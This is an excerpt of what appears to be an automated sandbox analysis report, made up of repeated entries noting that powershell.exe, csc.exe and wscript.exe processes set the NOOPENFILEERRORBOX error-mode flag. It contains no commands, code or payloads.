Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
